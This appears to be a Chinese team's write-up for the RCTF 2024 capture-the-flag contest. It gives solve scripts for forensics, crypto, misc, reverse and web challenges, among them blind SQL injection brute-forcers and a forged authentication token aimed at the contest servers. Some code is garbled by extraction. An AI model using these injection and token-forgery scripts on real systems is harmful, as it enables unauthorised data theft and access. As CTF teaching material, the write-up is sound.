构造私钥的策略是随机产生多项式s2,然后利用已有值拼接签名
最后似乎不需要调用18论文的代码,使用原生代码已经可以伪造
from sage.all import *
from pwn import *
def sign(io, msg: bytes) -> str:
io.sendlineafter(b'> ', b'1')
io.sendlineafter(b'Please input the message: ', msg.encode())
io.recvuntil(b'You have signed the message successfullyn')
sig = io.recvline().strip().decode()
return sig
def verify(io, sig: str):
io.sendlineafter(b'> ', b'2')
io.sendlineafter(b'Please input the signature (as hex):n', sig.encode())
res = io.recvline().strip().decode()
return res
def m_pk_sig(m, pk, sig):
io = process('./m_pk_sig')
io.sendlineafter(b'm>n', m.encode())
io.sendlineafter(b'pk>n', pk.encode())
io.sendlineafter(b'sig>n', sig.encode())
zs = list()
for i in range(3):
io.recvuntil(f'z{i}: '.encode())
z = list(map(int, io.recvline().strip().decode().split()))
zs.append(z)
io.recvuntil(b'c: ')
c = list(map(int, io.recvline().strip().decode().split()))
io.close()
return zs, c
def s1_sig(s1s, pk):
io = process('./s1_sig')
io.sendlineafter(b'pk>n', pk.encode())
for i in range(3):
io.sendlineafter(b':', ' '.join(map(str, s1s[i])).encode())
io.recvuntil(b'sig: ')
sig = io.recvline().strip().decode()
io.close()
return sig
host, port = '121.37.182.7 10088'.split()
io = remote(host, port)
io.recvuntil(b'This is your public key: ')
pk = io.recvline().strip().decode()
m = 'rec'
sig = sign(io, m)
zs, c = m_pk_sig(m, pk, sig)
N = 256
q = 8380417
R.<x> = GF(7)[]
QR.<x> = R.quotient_ring(x^N+1)
s1s = list()
for i in range(3):
s1 = [ZZ(_) for _ in (QR(zs[i])/QR(c)).list()]
s1 = [i if i < 4 else i-7 for i in s1]
s1s.append(s1)
sig = s1_sig(s1s, pk)
print(verify(io, sig))
io.interactive()
cpp源码存储得比较乱,后面有机会再整理
Forensics-FindAHacker
把 ida 进程 dump 一下
.volatility.exe -f .Windows_7_x64_52Pojie_2-Snapshot2.vmem --profile Win7SP1x64 memdump -p 2172 --dump-dir=./
数据:
35 3f 4e 2b 56 6b 74 6a 5d 6d 6f 73 6c 77 38 68 59 6e 20 21 3c 71 4f 09 36 7d 55 72 51 32 27 66
0c 0f +Ho]FSdYYK_G[[k_ 15 16 ] 12 vk 07 1b 3Jg 07 11 0
异或可得到flag
mmm = [0x35,0x3f,0x4e,0x2b,0x56,0x6b,0x74,0x6a,0x5d,0x6d,0x6f,0x73,0x6c,0x77,0x38,0x68,0x59,0x6e,0x20,0x21,0x3c,0x71,0x4f,0x09,0x36,0x7d,0x55,0x72,0x51,0x32,0x27,0x66]
enc = [0x0c,0x0f,0x2b,0x48,0x6f,0x5d,0x46,0x53,0x64,0x59,0x59,0x4b,0x5f,0x47,0x5b,0x5b,0x6b,0x5f,0x15,0x16,0x5d,0x12,0x76,0x6b,0x07,0x1b,0x33,0x4a,0x67,0x07,0x11,0x0]
flag=[]
for i in range(len(mmm)):
flag.append(chr(mmm[i]^enc[i]))
print(''.join(flag))
#90ec9629946830c32157ac9b1ff8656f
RCTF{90ec9629946830c32157ac9b1ff8656f}
Web-what_is_love
简单看了两眼,key1在数据库中,key2需要伪造身份拿到
key1=1' || BINARY love_key REGEXP 'RCTF{' # 这样可以去拿key1
import requests
url="http://1.94.13.174:10088/key1"
flag='RCTF{'
payload="1' || BINARY love_key > '{}' #"
for i in range(100000):
for j in range(32,128):
data={
'key1':payload.format(flag+chr(j))
}
req=requests.post(url,data=data)
if "wrong" in req.text:
flag=flag+chr(j-1)
print(flag)
break
if j==127:
exit(0)
上面用的>去做匹配 由于长度限制还得配上REGEXP去跑剩下的flag
import requests
url="http://1.94.13.174:10088/key1"
flag='TO_KNOW'
payload="1' || BINARY love_key regexp '{}' #"
for i in range(100000):
for j in range(32,128):
data={
'key1':payload.format(flag+"\\"+chr(j))
}
req=requests.post(url,data=data)
if "success" in req.text:
flag=flag+chr(j)
print(flag)
if len(flag) > 20:
print("src_flag", flag)
flag=flag.replace("\\",'')[:-4]
break
if j==127:
exit(0)
RCTF{THE_FIRST_STEP_IS_TO_GET_TO_KNOW
加密方式是sha256,先获取正常的token。lover_time传一个字母
由于lover_time被Number处理后会变成NaN,在加密的时候与secret拼接,saltedSecret也会是NaN,所以直接
{"lovetime":null,"have_lovers":true}:NaN 拿去sha256替换掉上方的sha256,base64也换一下就成了
import requests
import base64
import hashlib
import json
url = "http://1.94.13.174:10088/key2"
data = {
"username": "lover",
"love_time": "a"
}
response = requests.post(url, data=data)
token = response.text.split("token:")[1].strip()
print(f"Obtained token: {token}")
userinfo = {
"username": "lover",
"love_time": None,
"have_lovers": True
}
data_hex = base64.b64encode(json.dumps(userinfo).encode()).decode()
signature = hashlib.sha256(f'{json.dumps(userinfo)}:NaN'.encode()).hexdigest()
evil_token = f"{data_hex}.{signature}"
print(f"Constructed evil token: {evil_token}")
url = "http://1.94.13.174:10088/check"
data = {
"love_token": evil_token
}
response = requests.post(url, data=data)
print(f"Response from /check: {response.text}")
#_AND_GIVE_A_10000_YEAR_COMMITMENT_FOR_LOVE}Crypto-Mersenne
f、g、h是一个ntru样本,可以直接LLL得到f和g来,有很小的几率出错。
由于a、b、f、g汉明重量全都很低很低,并且p是一个Mersenne prime,所以模他等价于取低位,所以如果当前bit为0的话,会有:
这个汉明重量还是较低的,测试出来大概在200出头的样子,而如果为1则恰好等于取反,汉明重量应该会接近400,如此就可以做decision。
由于f、g可能会出错,所以跑多次就好了。
exp:
from random import randint
from Crypto.Util.number import *
from pwn import *
flag = ["*" for i in range(336)]
while(1):
p = 2^607-1
sh = remote("123.60.161.30",10089)
for i in range(336):
ans = sh.recvline().strip().decode().split(" ")
c,h = int(ans[0]),int(ans[1])
######################################
L = Matrix(ZZ,[
[1,h],
[0,p]
])
res = L.LLL()[0]
f,g = abs(res[1]) , abs(res[0])
if(bin(c*g % p)[2:].count("1") < 240):
flag[i] = "0"
elif(bin(c*g % p)[2:].count("1") > 360):
flag[i] = "1"
if("*" not in flag):
break
sh.close()
print(long_to_bytes(int("".join(flag),2)))
Misc-EzLogin
交互脚本如下,感谢rec提供的sha256
from pwn import *
import numpy as np
def proof(prefix: str, h: str) -> str:
import hashlib, itertools
prefix = bytes.fromhex(prefix)
for suffix in itertools.product(range(256), repeat=2):
suffix = bytes(suffix)
if hashlib.sha256(prefix + suffix).hexdigest() == h:
return suffix.hex()
sh = remote('121.37.179.243', 10088)
context.log_level = 'debug'
h = sh.recvline().decode().strip()[14:]
pre = sh.recvline().decode().strip()[15:]
print(h)
print(pre)
sh.sendline(proof(pre, h).encode())
sh.recvline()
img = np.array([[ 0., 0., 0., 0., 0., 255., 187., 255., 255., 255., 255.,
255., 237., 3., 0., 93., 166., 255., 255., 59., 0., 0.,
0., 55., 69., 255., 124., 255.],
[181., 0., 0., 0., 0., 255., 255., 255., 102., 172., 255.,
51., 255., 0., 0., 0., 202., 244., 255., 10., 138., 0.,
0., 0., 0., 0., 0., 255.],
[254., 250., 0., 0., 0., 0., 0., 51., 0., 0., 255.,
0., 255., 0., 0., 18., 0., 38., 203., 255., 0., 25.,
0., 0., 0., 0., 0., 255.],
[ 43., 255., 255., 255., 0., 0., 0., 255., 221., 255., 255.,
0., 0., 22., 255., 0., 255., 7., 26., 0., 255., 0.,
208., 22., 0., 0., 0., 16.],
[255., 255., 255., 136., 0., 255., 0., 255., 0., 255., 0.,
0., 0., 0., 253., 0., 40., 255., 116., 37., 146., 255.,
233., 107., 0., 0., 0., 0.],
[ 0., 0., 0., 225., 0., 255., 255., 255., 255., 4., 0.,
0., 0., 255., 125., 255., 197., 250., 0., 0., 255., 211.,
255., 255., 0., 255., 0., 255.],
[ 0., 0., 0., 0., 255., 0., 0., 255., 255., 255., 255.,
0., 0., 0., 255., 255., 0., 0., 0., 0., 255., 255.,
255., 255., 107., 58., 255., 255.],
[255., 255., 0., 0., 0., 0., 0., 255., 255., 255., 255.,
255., 255., 0., 255., 30., 130., 0., 17., 0., 0., 0.,
194., 255., 0., 255., 255., 255.],
[255., 0., 255., 0., 0., 0., 0., 0., 0., 255., 255.,
255., 0., 255., 255., 0., 255., 255., 255., 147., 77., 0.,
33., 255., 255., 255., 255., 167.],
[255., 255., 0., 255., 0., 217., 0., 255., 0., 0., 0.,
75., 0., 255., 0., 255., 0., 32., 88., 255., 255., 0.,
30., 255., 0., 255., 97., 211.],
[ 0., 255., 129., 153., 170., 255., 0., 255., 0., 255., 0.,
255., 255., 255., 255., 255., 0., 217., 0., 255., 41., 0.,
0., 0., 207., 0., 0., 0.],
[ 0., 0., 0., 0., 0., 0., 0., 0., 210., 255., 255.,
0., 255., 255., 255., 255., 198., 215., 0., 65., 255., 158.,
225., 0., 0., 0., 0., 255.],
[ 1., 0., 0., 0., 255., 0., 0., 255., 131., 114., 255.,
0., 0., 0., 63., 0., 255., 62., 76., 193., 255., 255.,
0., 255., 0., 0., 0., 0.],
[231., 255., 255., 255., 255., 255., 0., 0., 0., 0., 0.,
57., 0., 30., 44., 16., 0., 255., 246., 0., 255., 255.,
255., 238., 255., 0., 0., 255.],
[ 0., 255., 201., 0., 255., 255., 255., 246., 0., 15., 0.,
0., 0., 213., 237., 0., 28., 0., 255., 255., 255., 255.,
255., 255., 0., 0., 246., 255.],
[214., 0., 0., 55., 255., 1., 255., 255., 0., 0., 0.,
0., 205., 250., 255., 255., 255., 255., 0., 235., 91., 173.,
28., 255., 255., 0., 0., 5.],
[255., 255., 255., 255., 255., 255., 255., 0., 255., 233., 255.,
254., 0., 0., 97., 253., 0., 0., 255., 255., 255., 255.,
255., 255., 117., 255., 0., 255.],
[ 23., 20., 255., 255., 45., 102., 255., 255., 255., 0., 226.,
0., 0., 0., 0., 0., 0., 0., 255., 255., 255., 14.,
255., 0., 255., 255., 255., 255.],
[ 0., 0., 0., 0., 255., 0., 0., 0., 255., 43., 1.,
0., 0., 0., 0., 224., 33., 209., 255., 188., 255., 0.,
254., 0., 0., 255., 52., 16.],
[255., 0., 255., 255., 222., 0., 209., 122., 255., 255., 136.,
0., 0., 11., 0., 0., 0., 0., 255., 255., 255., 255.,
228., 58., 0., 255., 0., 0.],
[198., 0., 255., 255., 255., 121., 0., 222., 0., 0., 166.,
0., 0., 255., 69., 251., 144., 195., 105., 0., 117., 32.,
255., 204., 0., 200., 178., 0.],
[255., 0., 255., 162., 0., 0., 0., 0., 0., 199., 0.,
29., 255., 255., 255., 255., 255., 4., 0., 0., 0., 0.,
0., 0., 0., 255., 0., 107.],
[255., 255., 172., 0., 0., 0., 255., 0., 0., 80., 255.,
0., 0., 255., 106., 0., 20., 0., 0., 0., 0., 0.,
4., 0., 217., 255., 255., 206.],
[ 0., 228., 255., 255., 240., 0., 0., 0., 0., 255., 252.,
126., 0., 67., 0., 0., 255., 0., 255., 255., 0., 255.,
255., 255., 255., 185., 0., 180.],
[ 0., 0., 28., 255., 255., 238., 255., 25., 255., 0., 0.,
0., 0., 199., 0., 255., 0., 0., 0., 0., 0., 176.,
0., 0., 115., 117., 0., 237.],
[255., 0., 14., 255., 255., 163., 0., 0., 0., 0., 37.,
0., 0., 139., 92., 255., 9., 0., 0., 0., 0., 143.,
0., 225., 0., 230., 255., 230.],
[255., 255., 255., 255., 20., 90., 255., 255., 255., 255., 173.,
255., 255., 0., 0., 33., 58., 255., 255., 0., 0., 0.,
143., 255., 134., 50., 153., 21.],
[190., 255., 255., 255., 0., 0., 24., 255., 255., 255., 0.,
255., 255., 193., 0., 0., 0., 255., 0., 255., 0., 0.,
55., 0., 15., 0., 21., 21.]]).astype(np.uint8)
na = img.tobytes()
sh.sendline(na)
sh.recvall()
限定了数据范围的模型反演,自定义优化器秒了
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision
from torch import optim
import torchvision.transforms as transforms
import numpy as np
class CNN(nn.Module):
def __init__(self):
super(CNN, self).__init__()
self.conv1 = nn.Conv2d(1, 2, 3, padding=1)
self.conv2 = nn.Conv2d(2, 8, 3, padding=1)
self.conv3 = nn.Conv2d(8, 32, 3, padding=1)
self.pool = nn.MaxPool2d(2, 2)
self.fc1 = nn.Linear(32 * 3 * 3, 1024)
self.fc2 = nn.Linear(1024, 512)
self.fc3 = nn.Linear(512, 256)
self.fc4 = nn.Linear(256, 128)
self.fc5 = nn.Linear(128, 47)
def forward(self, x):
x = self.pool(self.conv1(x))
x = self.pool(self.conv2(x))
x = self.pool(self.conv3(x))
x = x.view(-1, 32 * 3 * 3)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = F.relu(self.fc3(x))
x = F.relu(self.fc4(x))
x = self.fc5(x)
return x
feature = torch.tensor([[-6.19499969e+01, -1.56200895e+01, -3.52624054e+01, -1.34233132e-01,
-6.48261490e+01, -1.47979248e+02, -5.15059547e+01, -1.14444227e+01,
4.33434563e+01, -3.69645386e+01, 2.00579977e+00, 4.74611549e+01,
-6.33986130e+01, -1.57887411e+01, -2.87570419e+01, -5.35021248e+01,
-1.73028266e+00, -3.61370316e+01, -7.58331375e+01, -7.46535110e+01,
-7.24118347e+01, -4.76773834e+01, 6.51892662e+00, -5.07196846e+01,
-1.03041328e+02, 4.72574463e+01, 9.03826065e+01, 5.30947495e+01,
-5.03226738e+01, -1.50200531e+02, -3.46447792e+01, -4.23207245e+01,
6.44030609e+01, -5.05351334e+01, -4.11206970e+01, -2.18300457e+01,
2.70750694e+01, -1.00022865e+02, 3.77698517e+01, -3.60703392e+01,
-6.88536682e+01, 1.16945248e+01, -4.62400284e+01, -4.79546585e+01,
6.10636101e+01, -1.12650543e+02, -1.34837357e+02,]], dtype=torch.float32)
model = CNN()
model.load_state_dict(torch.load('model.pt.state',map_location=torch.device('cpu')))
model.eval()
img = torch.randint(0, 256, (1, 28, 28)).float()
img.requires_grad = True
optim = torch.optim.SGD(, lr=0.001)
def loss_criterion(output, target):
return torch.sqrt(torch.sum((target - output)**2))
for i in range(1000000):
pred = model(img)
optim.zero_grad()
loss = loss_criterion(pred, feature)
loss.backward()
optim.step()
img.grad.zero_()
if i % 200 == 0:
print(loss.item())
if loss.item() < 6:
print(img)
g = img.grad[0]
img.requires_grad = False
for x in range(28):
for y in range(28):
if g[x, y] > 0:
img[0, x, y] = max(0, img[0, x, y]-1)
else:
img[0, x, y] = min(256, img[0, x, y]+1)
img.requires_grad = True
if i % 200 == 0:
print(loss.item())
Crypto-L³
res = '''
'''
res = [list(map(int, i.split(' '))) for i in res.split('n')]
from sage.all import *
p = 0x1795712A13E07F7CCA7A0B09B33EE746414E48863BD7EE1BD0D883460828FE88516774E44AC3F0CE5DA045688C40844677DA6D38582AC7CF2C00E8724AD399059E9298BB1AD9834DAA0481765FFBB00FCA71BAD1E024F7193334D71755B0EEA1D1C761E11FB67C3B495F8D12720A59A8AAEC3F8A59BD6BC45C8C236A29B74CBE823BF9A816556F6DD79364A3E87B02028F9B35C5BC46EE597ABDC1A465B9F41353DD514AA5B91326EB4868BA1C3BC8B74F55DBEF6E59BCF896E15C8400CA6B695C368EF87CBD99FDD4D33F5889EE36A571240B16FFD76C0FAEB81E4550B8549193E88CF630D2422903D1AA08CA369FE0E79DD04F581B7DD8CB1D3F28F9EE2583B
g = res[0][1]
xs = []
from sage.all import *
from Crypto.Util.number import *
p = 0x1795712A13E07F7CCA7A0B09B33EE746414E48863BD7EE1BD0D883460828FE88516774E44AC3F0CE5DA045688C40844677DA6D38582AC7CF2C00E8724AD399059E9298BB1AD9834DAA0481765FFBB00FCA71BAD1E024F7193334D71755B0EEA1D1C761E11FB67C3B495F8D12720A59A8AAEC3F8A59BD6BC45C8C236A29B74CBE823BF9A816556F6DD79364A3E87B02028F9B35C5BC46EE597ABDC1A465B9F41353DD514AA5B91326EB4868BA1C3BC8B74F55DBEF6E59BCF896E15C8400CA6B695C368EF87CBD99FDD4D33F5889EE36A571240B16FFD76C0FAEB81E4550B8549193E88CF630D2422903D1AA08CA369FE0E79DD04F581B7DD8CB1D3F28F9EE2583B
res = [list(map(int, i.split(' '))) for i in res.split('n')]
g = res[0][1]
xs =
ys =
q = (p - 1) // 2
def solve_affine_hlcp(xs, ys, m, n):
K = 2**4096
L = block_matrix(ZZ, [
[1, K*matrix(ZZ, [xs, ys]).T],
[0, K*q]
])
L = flatter(L)
L = L.matrix_from_rows_and_columns(range(m-n-1), range(m))
L = block_matrix(ZZ, [
[1, K*L.T]
])
L = flatter(L)
L = L.matrix_from_rows_and_columns(range(3), range(m))
return L
def check_es(es):
es0, es1, es2 = [vector(ZZ, es[i]) for i in range(3)]
if all(0 < i < 2^(65*8) for i in es0) or all(0 < i < 2^(65*8) for i in -es0):
if all(0 < i < 2^(64*8) for i in es1) or all(0 < i < 2^(64*8) for i in -es1):
if all(0 < i < 2^(64*8) for i in es2) or all(0 < i < 2^(64*8) for i in -es2):
return True
return False
m = 72
n = 4
L = solve_affine_hlcp(xs, ys, m, n)
for row in L:print([_.nbits() for _ in row])
import itertools, tqdm
for a in tqdm.tqdm(itertools.product(range(-250, 250), repeat=2)):
for b in [[0, 1], [0, -1], [1, 0], [-1, 0]]:
for c in itertools.product([-1, 1], repeat=3):
T = matrix(ZZ, [
[a[0], a[1], c[0]],
[b[0], c[1], 0],
[b[1], c[2], 0]
])
try:
ee = T*L
if check_es(ee):
es0, es1, es2 = [vector(ZZ, ee[i]) for i in range(3)]
if es0[0] < 0:es0 = -es0
if es1[0] < 0:es1 = -es1
if es2[0] < 0:es2 = -es2
otp_key = bytes([int(es0[i] >> (32*8)) & 0xff for i in range(72)])
v = matrix(Zmod(q), xs) / matrix(Zmod(q), [es0, es1, es2, ys])
otp_flag = long_to_bytes(ZZ(-v.list()[-1]))
flag = bytes([k ^^ c for k, c in zip(otp_key, otp_flag)])
if b'RCTF' in flag:
print(T)
print(flag)
except Exception as e:
continue
Misc-sec-image
12可以去确定第四个字符,在6和9的图片有重复的字符0和2
最后判断出flag
RCTF{c4baf0eb-e5ca-543a-06d0-39d72325a0}
思路:
从ps的nearest缩放的预览可以发现是分块渲染的做法
这是同一张图片文件在预览的不同拖拽视角显示的
全是在400x400的时候显示的
emmm
光栅,感觉是非预期
我的做法直接把图片拆成2x2区域,每个800x800的图片拆成四个400x400的图片
import numpy as np
import os
from PIL import Image
for filename in [_ for _ in os.listdir() if _.startswith('flag')]:
img = Image.open(filename)
img_array = np.array(img)
new_img_array = np.zeros((400, 400, 3), dtype=np.uint8)
for index, (a, b) in enumerate([(0, 0), (0, 1), (1, 0), (1, 1)]):
new_img_array[:, :, :] = img_array[a::2, b::2, :]
new_img = Image.fromarray(new_img_array)
new_img.save(f"2/{filename[:5]}_{index}.png")
清晰可见
RCTF{c4baf0eb-e5ca-543a-06d0-39d72325a0}
解法二
使用github的Raster-Terminator.py脚本,先向外再向内解析就可以获得flag
- from PIL import Image
import numpy as np
import argparse, io, sys, os
def title():
logo0='''
+------------------------------+--------------------------------------------------+
Title: Raster Terminator +..%%%%%....%%%%....%%%%...%%%%%%..%%%%%%..%%%%%...+
Introduction: 光栅图秒杀器 +..%%..%%..%%..%%..%%........%%....%%......%%..%%..+
Author: 曾哥(@AabyssZG) +..%%%%%...%%%%%%...%%%%.....%%....%%%%....%%%%%...+
Version: V1.1 +..%%..%%..%%..%%......%%....%%....%%......%%..%%..+
Whoami: +..%%..%%..%%..%%...%%%%.....%%....%%%%%%..%%..%%..+
https://github.com/AabyssZG +..................................................+
+------------------------------+..................................................+
+.................................................................................+
+.%%%%%%..%%%%%%..%%%%%...%%...%%..%%%%%%..%%..%%...%%%%...%%%%%%...%%%%...%%%%%..+
+...%%....%%......%%..%%..%%%.%%%....%%....%%%.%%..%%..%%....%%....%%..%%..%%..%%.+
+...%%....%%%%....%%%%%...%%.%.%%....%%....%%.%%%..%%%%%%....%%....%%..%%..%%%%%..+
+...%%....%%......%%..%%..%%...%%....%%....%%..%%..%%..%%....%%....%%..%%..%%..%%.+
+...%%....%%%%%%..%%..%%..%%...%%..%%%%%%..%%..%%..%%..%%....%%.....%%%%...%%..%%.+
+------------------------------+--------------------------------------------------+
'''
print(logo0)
def ImageRead(imagename):
print('[.] 读取图片当中.....')
img = Image.open(imagename)
width, height = img.size
print('[+] 图片长为:{} n[+] 图片宽为:{}'.format(width, height))
return width, height
def Folder():
if os.path.exists("./output"):
print(f"[.] 输出文件夹已经存在,无需创建")
datanames = os.listdir("./output")
for i in datanames:
c_path = os.path.join("./output", i)
if os.path.isdir(c_path):如果是文件夹那么递归调用一下
del_file(c_path)
else: 如果是一个文件那么直接删除
os.remove(c_path)
print(f"[+] 已经清空输出文件夹./outputn")
else:
os.mkdir("./output")
print(f"[+] 切割文件夹不存在,已经创建n")
def Operations(width,height,x,y):
width,height = int(width),int(height)
x,y = int(x),int(y)
output = []
if x == 2:
while x <= 10:
if (width % x == 0):
output.insert(1,x)
x = x+1
print('[+] 计算成功,获得以下横向数值' str(output))
elif y == 2:
while y <= 10:
if (height % y == 0):
output.insert(1,y)
y = y+1
print('[+] 计算成功,获得以下纵向数值' str(output))
else:
print('[-] 出现错误,请排查')
return output
def ImageWrite(x,y,imagename):
x,y = int(x),int(y)
img = np.array(Image.open(imagename))
if x != 0:
for i in range(x):
print('[+] 正在输出第 {} 张图片'.format(i+1))
z = np.zeros_like(img)
z[:, i::x, :] = img[:, i::x, :]
imgnew = Image.fromarray(z)
imgnew.save('./output/{}-{}.png'.format(x,i+1))
print('[+] 文件写入完毕,请查收!')
else:
for i in range(y):
print('[+] 正在输出第 {} 张图片'.format(i+1))
z = np.zeros_like(img)
z[i::y, :, :] = img[i::y, :, :]
imgnew = Image.fromarray(z)
imgnew.save('./output/{}-{}.png'.format(y,i+1))
print('[+] 文件写入完毕,请查收!')
def ImageOut(x,y,imagename):
x,y = int(x),int(y)
img = np.array(Image.open(imagename))
if x:
for i in range(x):
print('[+] 正在输出第 {} 张图片'.format(i+1))
z = np.zeros_like(img)
z[:, i::x, :] = img[:, i::x, :]
Image.fromarray(z).show()
print('[+] 输出完毕,请查收!')
else:
for i in range(y):
print('[+] 正在输出第 {} 张图片'.format(i+1))
z = np.zeros_like(img)
z[i::y, :, :] = img[i::y, :, :]
Image.fromarray(z).show()
print('[+] 输出完毕,请查收!')
if name == '__main__':
title()
parser = argparse.ArgumentParser(description="Raster Terminator V1.1", epilog='自动读取图片并尝试爆破光栅,诸如:python3 Raster-Terminator.py -x demo.png')
parser.add_argument('-x', action='store', dest='xcoordinate', help='自动读取图片并尝试爆破横向光栅图')
parser.add_argument('-y', action='store', dest='ycoordinate', help='自动读取图片并尝试爆破纵向光栅图')
parser.add_argument('-i', action='store', dest='imageout', help='自定义爆破光栅图')
args = parser.parse_args()
try:
if args.xcoordinate:
width, height = ImageRead(args.xcoordinate)
x,y,index = 2,0,0
outputend = []
outputend = Operations(width,height,x,y)
Folder()
while index < len(outputend):
x = outputend[index]
ImageWrite(x,y,args.xcoordinate)
index += 1
if args.ycoordinate:
width, height = ImageRead(args.ycoordinate)
x,y,index = 0,2,0
outputend = []
outputend = Operations(width,height,x,y)
Folder()
while index < len(outputend):
y = outputend[index]
ImageWrite(x,y,args.ycoordinate)
index += 1
if args.imageout:
ImageRead(args.imageout)
state = input("横向光栅还是纵向光栅(x/y)")
x,y = 0,0
if state == "x":
x = input("横向光栅多少量")
ImageOut(x,y,args.imageout)
elif state == "y":
y = input("纵向光栅多少量")
ImageOut(x,y,args.imageout)
else:
print("请输入x或者y")
sys.exit()
except KeyboardInterrupt:
print("Ctrl + C 手动终止了进程")
sys.exit()
except BaseException as e:
err = str(e)
print('脚本详细报错:' err)
sys.exit(0)
Re-2048
利用ssa+ssd的行走方式,大概率可以合成2048,如果卡住在加一个w。每次把分数全部压进去,多开几个进程进行爆破,可以很快达到100万。
from pwn import *
#io = process('./2048')
io=remote('1.94.104.104',10088)
io.recvuntil(b'score: ')
score = (io.recvuntil(b'n'))[:-1]
print(score)
print("##########")
for i in range(10000000000):
io.sendline(b'1')
io.sendline(score)
io.sendline(
b'ssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdwssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssd')
io.recvuntil(b'win')
io.recvline()
io.recvuntil(b'score: ')
score = (io.recvuntil(b'n'))[:-1]
print(score)
s = int(score.decode())
if (s > 1000000):
io.sendline(b'3')
a=io.recvuntil(b'exit')
b=io.recvall()
print(b)
break
Forensics-gogogo
导出火狐的数据库文件
.volatility.exe -f .gogogo.raw --profile Win7SP1x86_23418 dumpfiles -Q 0x000000007f634f80 -D .
找到百度网盘地址,http://pan.baidu.com/share/init?surl=ZllFd8IK-oHvTCYl61_7Kw
在剪切板找到提取码cwqs
.volatility.exe -f .gogogo.raw --profile Win7SP1x86_23418 clipboard
下载到zip
暂时无法在飞书文档外展示此内容
在火狐浏览器数据库中得到一个哔哩哔哩地址
https://space.bilibili.com/3546644702301067
访问后主页个性签名写着 pwd=uid,所以解压密码是
3546644702301067
解压后得到一个流量包和加密压缩包,直接键盘流量分析得到
niuo ybufmefhui kjqillxdjwmi uizebuui
dvoo
udpn uibuui jqybdm vegeyisi
vemeuoll jxysgowodmnkderf dbmzfa hkhkdazi
zvjnybufme hkwjdeggma
na mimajqueviig
kyllda doqisl ba
pnynqrpn
qrxcxxzimu
最后双拼输入法得到压缩包密码
kuailaidaduoqisaiba
Re-bloker_vm
不知道在考啥
msg = [0xb9,0xd9,0x70,0x6e,0x10,0x46,0x02,0xb1,0x6f,0x3f,0xcc,0xcc,0x29,0x06,0xcf,0x90,0xe3,0x2a,0xb4,0xee,0x30,0xcd,0xad,0x26,0x0e]
des = [0x80,0x05,0xe3,0x2f,0x18,0x2f,0xc5,0x8c,0x25,0x70,0xbc,0x05,0x1c,0x4f,0xf2,0x02,0xe5,0x3e,0x02,0x2f,0xe5,0x11,0xa3,0xc0,0x00]
dst = [0x88, 0x0D, 0xEB, 0x27, 0x18, 0x3B, 0x5E, 0x58, 0x31, 0xA4, 0xAE, 0x9E, 0x49, 0x5A, 0x26, 0x13, 0x70, 0xA5, 0xD6, 0x78,0x72, 0x87, 0xB6, 0x10,0x00]
m = 'rctf{1111111111111111111}'
for i in range(len(m)):
a = ord(m[i]) ^ 0x7d
b = ((a << 6) | (a >> 2) & 0x3F) & 0xff
c = des[i] ^ dst[i] ^ b
d = (((c << 2) | (c >> 6)) & 0xff) ^ 0x7d
print(chr(d),end='')
#RCTF{a_baby_debug_bloker}
原文始发于微信公众号(N0wayBack):XCTF x RCTF2024 WP
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论